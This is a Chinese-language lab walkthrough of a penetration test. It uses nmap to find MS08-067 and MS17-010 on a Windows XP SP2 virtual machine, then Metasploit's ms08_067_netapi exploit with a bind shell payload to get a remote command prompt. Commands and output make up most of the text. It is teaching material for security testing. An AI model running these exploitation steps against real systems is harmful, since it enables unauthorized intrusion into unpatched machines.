滲透測試本機使用linux,安裝的工具分別爲:nmap,msfconsole,nmap用來進行對形態進行掃描,主要掃描系統開放的端口,系統版本信息,局域網存在漏洞的主機;msfconsole主要是用來進行滲透攻擊;
靶機爲 xp sp2,linux上使用kvm虛擬機安裝xp sp2系統;
開始在linux上用nmap進行掃,因爲本機使用的虛擬網橋,橋接到虛擬機,所以網絡是互通的,進行掃描的時候靶機與本機防火牆都要開放;
nmap -O -sS --script=vuln 192.168.122.112
因爲事先知道靶機ip爲192.168.122.112,所以就不用進行對子網掃描了,掃描子網的指令是:
nmap -sT 192.168.122.1/24
上面是進行三次握手掃描子網;掃描的結果如下:
Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-02 18:07 CST
Nmap scan report for 192.168.122.112
Host is up (0.0019s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 52:54:00:C4:B0:EE (QEMU virtual NIC)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003, Microsoft Windows XP SP2 or Windows Server 2003 SP2
Network Distance: 1 hop
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.14 seconds
上面掃出兩個漏洞,ms08-067與ms17-010(永恆之藍);由於ms17-010,targets爲:
msf5 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets
Exploit targets:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
window7 and Server 2008 R2,所以本次不進行測試,如果適合此係統,測試了一下,會一直讓對方藍屏;本次使用ms08-067漏洞進行測試;
msf5 exploit(windows/smb/ms17_010_eternalblue) > search MS08-067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > show playload
[-] Invalid parameter "playload", use "show -h" for more information
msf5 exploit(windows/smb/ms08_067_netapi) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 generic/custom manual No Custom Payload
1 generic/debug_trap manual No Generic x86 Debug Trap
2 generic/shell_bind_tcp manual No Generic Command Shell, Bind TCP Inline
3 generic/shell_reverse_tcp manual No Generic Command Shell, Reverse TCP Inline
4 generic/tight_loop manual No Generic x86 Tight Loop
5 windows/adduser man
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.122.112
rhost => 192.168.122.112
msf5 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.122.1
lhost => 192.168.122.1
msf5 exploit(windows/smb/ms08_067_netapi) > set rport 445
rport => 445
msf5 exploit(windows/smb/ms08_067_netapi) > set generic/shell_bind_tcp
[-] Unknown variable
Usage: set [option] [value]
Set the given option to value. If value is omitted, print the current value.
If both are omitted, print options that are currently set.
If run from a module context, this will set the value in the module's
datastore. Use -g to operate on the global datastore.
If setting a PAYLOAD, this command can take an index from `show payloads'.
msf5 exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.122.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (generic/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.122.112 no The target address
Exploit target:
Id Name
-- ----
0 Automatic Targeting
開始滲透:
msf5 exploit(windows/smb/ms08_067_netapi) > set target 10
target => 10
msf5 exploit(windows/smb/ms08_067_netapi) > exploit
[*] 192.168.122.112:445 - Attempting to trigger the vulnerability...
[*] Started bind TCP handler against 192.168.122.112:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.122.112:4444) at 2020-05-02 17:59:15 +0800
dir
dir
������ C �еľ�û�б�ǩ��
��������� CC72-722A
C:\WINDOWS\system32 ��Ŀ¼
2020-05-02 17:33 <DIR> .
2020-05-02 17:33 <DIR> ..
2020-05-02 17:31 261 $winnt$.inf
2020-05-03 01:16 <DIR> 1025
2020-05-03 01:16 <DIR> 1028
2020-05-03 01:16 <DIR> 1031
2020-05-03 01:17 <DIR> 1033
2020-05-03 01:16 <DIR> 1037
2020-05-03 01:16 <DIR> 1041
2020-05-03 01:16 <DIR> 1042
2020-05-03 01:16 <DIR> 1054
2006-03-02 20:00 2,151 12520437.cpx
2006-03-02 20:00 2,233 12520850.cpx
上面能夠執行靶機的cmd了,說明已經滲透成功了;本文章適合測試使用;